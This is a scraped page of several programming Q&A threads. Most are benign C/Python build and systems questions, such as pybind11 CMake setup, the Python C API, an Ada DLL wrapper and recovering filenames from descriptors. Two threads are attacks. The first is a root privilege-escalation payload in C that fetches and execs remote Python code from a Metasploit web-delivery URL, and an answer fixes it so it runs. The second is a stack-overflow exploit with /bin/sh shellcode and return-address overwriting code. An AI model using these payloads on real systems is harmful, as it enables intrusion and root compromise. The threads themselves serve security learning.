How to stop URL from being commented out (C) - python

I've been attempting a privilege escalation exploit on Linux, and it will run whatever file is at /tmp/run as the root user (Linux kernel 2.6 UDEV exploit). I've decided to make my payload in C (for an added challenge). It simply needs to execute a single python command (generated by Metasploit's web delivery module). The issue is, when I enter a URL as a string, the // in http:// will comment out the rest of the URL.
I don't know that much C whatsoever, so I have no idea how to fix this issue. This may seem a bit noob-ish, but I really can't find an answer anywhere.
Current code:
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"" <== // in http:// comments out rest of line
return 0;
}
Is there a proper way to fix this?

// does not make a comment inside of a string literal. The use of // in the string is not the problem you posted, instead, you should finish the system function call with closing ).
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"");
return 0;
}

Related

The correct CMakeLists.txt file to call a MAXON libarary in a Python script using pybind11

I'm very new to the whole CMake. Following this and this posts, now I want to call a MAXON function inside Python, using pybind11. What I have done so far:
The library can be downloaded from this page (direct download link).
wget https://www.maxongroup.com/medias/sys_master/root/8837358518302/EPOS-Linux-Library-En.zip
unzip:
unzip EPOS-Linux-Library-En.zip
make the install shell script executable and run it:
chmod +x ./install.sh
sudo ./install.sh
Then going to the example folder:
cd /opt/EposCmdLib_6.6.1.0/examples/HelloEposCmd/
Now combining the CMakeLists.txt files from here:
# CMakeLists.txt
cmake_minimum_required(VERSION 2.8.12)
project (HelloEposCmd)
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} -Wall")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -Wall")
set(CMAKE_POSITION_INDEPENDENT_CODE ON)
find_package(pybind11 REQUIRED)
pybind11_add_module(${PROJECT_NAME} HelloEposCmd.cpp)
add_executable(${PROJECT_NAME} HelloEposCmd.cpp)
target_link_libraries(${PROJECT_NAME} -lEposCmd)
and the HelloEposCmd.cpp this line is added right after other header files:
#include <pybind11/pybind11.h>
the main function is renamed to:
int run(int argc, char** argv)
and the pybind11 syntax to add the module is written at the end:
PYBIND11_MODULE(HelloEposCmd, m) {
m.def("run", &run, "runs the HelloEposCmd");
}
However, When I run the cmake . I get the error:
CMake Error at CMakeLists.txt:13 (add_executable):
add_executable can not create target "HelloEposCmd" because another target with the same name already exists. The existing target is a module library created in source directory "/opt/EposCmdLib_6.6.1.0/examples/HelloEposCmd" See documentation for policy CMP0002 for more details.
...
I was wondering if you could be kind to help me get the right CMakeList.txt file. Ideally, I should be able to call the compiled module in python:
# HelloEposCmd.py
import HelloEposCmd
HelloEposCmd.run()
Thanks for your support in advance.
pybind11_add_module already creates a target for you. So you don't need add_executable anymore. Just remove that line and when you will build you will get a library with the name HelloEposCmd
add_executable is needed if you are building an executable (.exe), which I believe is not what you want.
Documenation of pybind11 says.
This function behaves very much like CMake’s builtin add_library (in fact, it’s a wrapper function around that command).
Thanks to abhilb post and his kind followup in the comments I was able to figure the problem out. well, at least find a temporary workaround:
According to this post, the last two lines of the CMakeLists.txt file should change to
# this line can be removed
# add_executable(${PROJECT_NAME} HelloEposCmd.cpp)
target_link_libraries(${PROJECT_NAME} PRIVATE -lEposCmd)
and then because according to this post pybind11 doesn't support double pointers we change the run function to:
int run() {
int argc = 1;
char* argv[] = {"./HelloEposCmd"};
...
}
which I suppose to be a horrible workaround (inspired by information from this page). Now running cmake ., make and python3 HelloEposCmd.py should work properly (except a small c++ warning!).
P.S.1. Maybe someone could use std::vector<std::string> as suggested here. This idea was proposed here and there are already some answers worth investigating.
P.S.2. Following this discussion, another workaround could be something like:
#include <stdio.h>
#include <stdlib.h>
void myFunc(int argc, char* argv[]) {
for (int i = 0; i < argc; ++i) {
printf("%s\n", argv[i]);
}
}
int run(int argc, long* argv_) {
char** argv = (char**)malloc(argc * sizeof(char*));
for (int i = 0; i < argc; ++i) {
argv[i] = (char*)(argv_[i]);
}
myFunc(argc, argv);
free(argv);
return 0;
}

Python C API free() errors after using Py_SetPath() and Py_GetPath()

I'm trying to figure out why I can't simply get and set the python path through its C API. I am using Python3.6, on Ubuntu 17.10 with gcc version 7.2.0. Compiling with:
gcc pytest.c `python3-config --libs` `python3-config --includes`
#include <Python.h>
int main()
{
Py_Initialize(); // removes error if put after Py_SetPath
printf("setting path\n"); // prints
Py_SetPath(L"/usr/lib/python3.6"); // Error in `./a.out': free(): invalid size: 0x00007fd5a8365030 ***
printf("success\n"); // doesn't print
return 0;
}
Setting the path works fine, unless I also try to get the path prior to doing so. If I get the path at all, even just to print without modifying the returned value or anything, I get a "double free or corruption" error.
Very confused. Am I doing something wrong or is this a bug? Anyone know a workaround if so?
Edit: Also errors after calling Py_Initialize();. Updated code. Now errors even if I don't call Py_GetPath() first.
From alk it seems related to this bug: https://bugs.python.org/issue31532
Here is the workaround I am using. Since you can't call Py_GetPath() before Py_Initialize(), and also seemingly you can't call Py_SetPath() after Py_Initialize(), you can add to or get the path like this after calling Py_Initialize():
#include <Python.h>
int main()
{
Py_Initialize();
// get handle to python sys.path object
PyObject *sys = PyImport_ImportModule("sys");
PyObject *path = PyObject_GetAttrString(sys, "path");
// make a list of paths to add to sys.path
PyObject *newPaths = PyUnicode_Split(PyUnicode_FromWideChar(L"a:b:c", -1), PyUnicode_FromWideChar(L":", 1), -1);
// iterate through list and add all paths
for(int i=0; i<PyList_Size(newPaths); i++) {
PyList_Append(path, PyList_GetItem(newPaths, i));
}
// print out sys.path after appends
PyObject *newlist = PyUnicode_Join(PyUnicode_FromWideChar(L":", -1), path);
printf("newlist = %ls\n", PyUnicode_AsWideCharString(newlist, NULL));
return 0;
}
[the below answer refers to this version of the question.]
From the docs:
void Py_Initialize()
Initialize the Python interpreter. In an application embedding Python, this should be called before using any other Python/C API functions; with the exception of Py_SetProgramName(), Py_SetPythonHome() and Py_SetPath().
But the code you show does call Py_GetPath() before it calls Py_Initialize();, which it per the above paragraph implicitly should not.

Wrapper DLL for Python: "fatal error LNK1127: library is corrupt"

Brief description
I have a DLL programmed in ADA with GNAT. I want to compile with MSVC another DLL in C as a wrapper to the ADA_DLL in order to use it with Python.
I have compiled the ada_DLL, then I have generated the .lib file according to gnat documentation about MSVC. And finally I tried to compile the C_DLL with Visual-Studio, getting the error:
libmath.lib : fatal error LNK1127: library is corrupt
Update: In the case of compiling with gcc as suggested by #Brian, I get the following output:
>"C:\GNAT\2015\bin\gcc.exe" -c -IC:\Python27\include -o libmath_c.o libmath_c.c
>"C:\GNAT\2015\bin\gcc.exe" -shared -LC:\Python27\libs -L./ -l libmath -o DIVISION_CPP.pyd libmath_c.o -lpython27
.//libmath.lib: error adding symbols: Malformed archive
collect2.exe: error: ld returned 1 exit status
Things I tried & more data:
I have tried importing the ADA_DLL directly with ctypes in Python and it works, so I believe that the ADA_DLL is correctly compiled. Also, forgetting about the C_DLL is not really an option.
I did a small example with a division example module. My .def file looks something like:
; dlltool -z libmath.def --export-all-symbols libmath.dll
EXPORTS
[...]
div # 259
[...]
The libmath_c.c:
#include "libmath_c.h"
PyObject* _wrap_DIVISION(PyObject *self, PyObject *args){
div(10, 2);
return Py_None;
}
__declspec(dllexport) void __cdecl initDIVISION_CPP(void){
Py_InitModule("DIVISION_CPP", LIB_METHODS_methods);
}
The libmath_c.h:
#include <windows.h>
#include <stdio.h>
#include <Python.h>
PyObject* _wrap_DIVISION(PyObject *self, PyObject *args);
static PyMethodDef LIB_METHODS_methods[] = {
{ "CPP_DIVISION", _wrap_DIVISION, METH_VARARGS },
{NULL, NULL, 0, NULL} //Added as indicated by #Brian. Thanks!
};
__declspec(dllexport) void __cdecl initDIVISION_CPP(void);
Any idea of what is happening? Any help would be really appreciated. Thanks!
Preamble: Apologies if this turns out to be a non-answer; I want to be able to come back to this and find the links again, and comments tend to rot...
First, gcc (in the version matching Gnat) may work as an alternative C compiler, and if it does, it may eliminate difficulties with incompatible library versions.
GCC can be used for building Windows DLLs so the result should be usable from other Windows executables.
Following comments; gcc does appear to allow compilation, but the result is not currently usable from Python - here, my Python knowledge is shallow, and we don't have an MCVE, so this is speculative:
This Q&A addresses the same error message between Python and pure C, with no Ada, suggesting this error may not be specific to C-wrapped Ada.
You have already bypassed the asker's specific error,
static PyMethodDef* _npfindmethods = { ... };
which was using a pointer; you are (correctly according to the answer) statically allocating an array. However, the accepted answer terminates the list of methods
static PyMethodDef _npfindmethods[] = {
{"add", py_add, METH_VARARGS, py_add_doc},
{NULL, NULL, 0, NULL}
};
with a NULL method; your example does not:
static PyMethodDef LIB_METHODS_methods[] = {
{ "CPP_DIVISION", _wrap_DIVISION, METH_VARARGS }
};
So my hypothesis is that when you run setup() on this module, it finds CPP_DIVISION successfully, then in the absence of a NULL method it runs off into the weeds, producing the same symptoms despite the difference in cause.
I could test this hypothesis using the MCVE in that question by deleting the NULL method; however I don't have a Windows system handy, only Linux.
Alternatively, I see no reason for a C layer. If there isn't one, this Q&A addresses direct interaction between Python and Ada with no C layer, though it appears to use a different method, getattr() to import the external method. Might be an alternative?
Finally I managed to compile with gcc+gnat but not with MSVC+gnat.
With gcc+gnat, I was getting .//libmath.lib: error adding symbols: Malformed archive. The solution consists on using libmath.dll instead of building the .lib from the .dll.
So, in summary:
If you have a .dll generated by gnat, use it with gcc. You don't need to build a .lib.
If you have a .lib (for example python27.lib) or a .dll not generated by gnat, convert it to a .a using a tool like "pexport" (DO NOT USE SED!).
If you really need to compile using the MSVC... I'm sorry, I could not manage to make it work. Your princess is in another castle.

How can I get the new name of a renamed file given its file descriptor/object? [duplicate]

Is it possible to get the filename of a file descriptor (Linux) in C?
You can use readlink on /proc/self/fd/NNN where NNN is the file descriptor. This will give you the name of the file as it was when it was opened — however, if the file was moved or deleted since then, it may no longer be accurate (although Linux can track renames in some cases). To verify, stat the filename given and fstat the fd you have, and make sure st_dev and st_ino are the same.
Of course, not all file descriptors refer to files, and for those you'll see some odd text strings, such as pipe:[1538488]. Since all of the real filenames will be absolute paths, you can determine which these are easily enough. Further, as others have noted, files can have multiple hardlinks pointing to them - this will only report the one it was opened with. If you want to find all names for a given file, you'll just have to traverse the entire filesystem.
I had this problem on Mac OS X. We don't have a /proc virtual file system, so the accepted solution cannot work.
We do, instead, have a F_GETPATH command for fcntl:
F_GETPATH Get the path of the file descriptor Fildes. The argu-
ment must be a buffer of size MAXPATHLEN or greater.
So to get the file associated to a file descriptor, you can use this snippet:
#include <sys/syslimits.h>
#include <fcntl.h>
char filePath[PATH_MAX];
if (fcntl(fd, F_GETPATH, filePath) != -1)
{
// do something with the file path
}
Since I never remember where MAXPATHLEN is defined, I thought PATH_MAX from syslimits would be fine.
In Windows, with GetFileInformationByHandleEx, passing FileNameInfo, you can retrieve the file name.
As Tyler points out, there's no way to do what you require "directly and reliably", since a given FD may correspond to 0 filenames (in various cases) or > 1 (multiple "hard links" is how the latter situation is generally described). If you do still need the functionality with all the limitations (on speed AND on the possibility of getting 0, 2, ... results rather than 1), here's how you can do it: first, fstat the FD -- this tells you, in the resulting struct stat, what device the file lives on, how many hard links it has, whether it's a special file, etc. This may already answer your question -- e.g. if 0 hard links you will KNOW there is in fact no corresponding filename on disk.
If the stats give you hope, then you have to "walk the tree" of directories on the relevant device until you find all the hard links (or just the first one, if you don't need more than one and any one will do). For that purpose, you use readdir (and opendir &c of course) recursively opening subdirectories until you find in a struct dirent thus received the same inode number you had in the original struct stat (at which time if you want the whole path, rather than just the name, you'll need to walk the chain of directories backwards to reconstruct it).
If this general approach is acceptable, but you need more detailed C code, let us know, it won't be hard to write (though I'd rather not write it if it's useless, i.e. you cannot withstand the inevitably slow performance or the possibility of getting != 1 result for the purposes of your application;-).
Before writing this off as impossible I suggest you look at the source code of the lsof command.
There may be restrictions but lsof seems capable of determining the file descriptor and file name. This information exists in the /proc filesystem so it should be possible to get at from your program.
You can use fstat() to get the file's inode by struct stat. Then, using readdir() you can compare the inode you found with those that exist (struct dirent) in a directory (assuming that you know the directory, otherwise you'll have to search the whole filesystem) and find the corresponding file name.
Nasty?
There is no official API to do this on OpenBSD, though with some very convoluted workarounds, it is still possible with the following code, note you need to link with -lkvm and -lc. The code using FTS to traverse the filesystem is from this answer.
#include <string>
#include <vector>
#include <cstdio>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
#include <sys/sysctl.h>
#include <kvm.h>
using std::string;
using std::vector;
string pidfd2path(int pid, int fd) {
string path; char errbuf[_POSIX2_LINE_MAX];
static kvm_t *kd = nullptr; kinfo_file *kif = nullptr; int cntp = 0;
kd = kvm_openfiles(nullptr, nullptr, nullptr, KVM_NO_FILES, errbuf); if (!kd) return "";
if ((kif = kvm_getfiles(kd, KERN_FILE_BYPID, pid, sizeof(struct kinfo_file), &cntp))) {
for (int i = 0; i < cntp; i++) {
if (kif[i].fd_fd == fd) {
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link;
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (child->fts_statp->st_dev == kif[i].va_fsid) {
if (child->fts_statp->st_ino == kif[i].va_fileid) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
finish:
fts_close(file_system);
}
}
}
}
kvm_close(kd);
return path;
}
int main(int argc, char **argv) {
if (argc == 3) {
printf("%s\n", pidfd2path((int)strtoul(argv[1], nullptr, 10),
(int)strtoul(argv[2], nullptr, 10)).c_str());
} else {
printf("usage: \"%s\" <pid> <fd>\n", argv[0]);
}
return 0;
}
If the function fails to find the file, (for example, because it no longer exists), it will return an empty string. If the file was moved, in my experience when moving the file to the trash, the new location of the file is returned instead if that location wasn't already searched through by FTS. It'll be slower for filesystems that have more files.
The deeper the search goes in the directory tree of your entire filesystem without finding the file, the more likely you are to have a race condition, though still very unlikely due to how performant this is. I'm aware my OpenBSD solution is C++ and not C. Feel free to change it to C and most of the code logic will be the same. If I have time I'll try to rewrite this in C hopefully soon. Like macOS, this solution gets a hardlink at random (citation needed), for portability with Windows and other platforms which can only get one hard link. You could remove the break in the while loop and return a vector if you want don't care about being cross-platform and want to get all the hard links. DragonFly BSD and NetBSD have the same solution (the exact same code) as the macOS solution on the current question, which I verified manually. If a macOS user wishes to get a path from a file descriptor opened any process, by plugging in a process id, and not be limited to just the calling one, while also getting all hard links potentially, and not being limited to a random one, see this answer. It should be a lot more performant that traversing your entire filesystem, similar to how fast it is on Linux and other solutions that are more straight-forward and to-the-point. FreeBSD users can get what they are looking for in this question, because the OS-level bug mentioned in that question has since been resolved for newer OS versions.
Here's a more generic solution which can only retrieve the path of a file descriptor opened by the calling process, however it should work for most Unix-likes out-of-the-box, with all the same concerns as the former solution in regards to hard links and race conditions, although performs slightly faster due to less if-then, for-loops, etc:
#include <string>
#include <vector>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
using std::string;
using std::vector;
string fd2path(int fd) {
string path;
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link; struct stat info = { 0 };
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (!fstat(fd, &info) && !S_ISSOCK(info.st_mode)) {
if (child->fts_statp->st_dev == info.st_dev) {
if (child->fts_statp->st_ino == info.st_ino) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
}
finish:
fts_close(file_system);
}
return path;
}
An even quicker solution which is also limited to the calling process, but should be somewhat more performant, you could wrap all your calls to fopen() and open() with a helper function which stores basically whatever C equivalent there is to an std::unordered_map, and pair up the file descriptor with the absolute path version of what is passed to your fopen()/open() wrappers (and the Windows-only equivalents which won't work on UWP like _wopen_s() and all that nonsense to support UTF-8), which can be done with realpath() on Unix-likes, or GetFullPathNameW() (*W for UTF-8 support) on Windows. realpath() will resolve symbolic links (which aren't near as commonly used on Windows), and realpath() / GetFullPathNameW() will convert your existing file you opened from a relative path, if it is one, to an absolute path. With the file descriptor and absolute path stored an a C equivalent to a std::unordered_map (which you likely will have to write yourself using malloc()'d and eventually free()'d int and c-string arrays), this will again, be faster than any other solution that does a dynamic search of your filesystem, but it has a different and unappealing limitation, which is it will not make note of files which were moved around on your filesystem, however at least you can check whether the file was deleted using your own code to test existence, it also won't make note of the file in whether it was replaced since the time you opened it and stored the path to the descriptor in memory, thus giving you outdated results potentially. Let me know if you would like to see a code example of this, though due to files changing location I do not recommend this solution.
Impossible. A file descriptor may have multiple names in the filesystem, or it may have no name at all.
Edit: Assuming you are talking about a plain old POSIX system, without any OS-specific APIs, since you didn't specify an OS.

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

Categories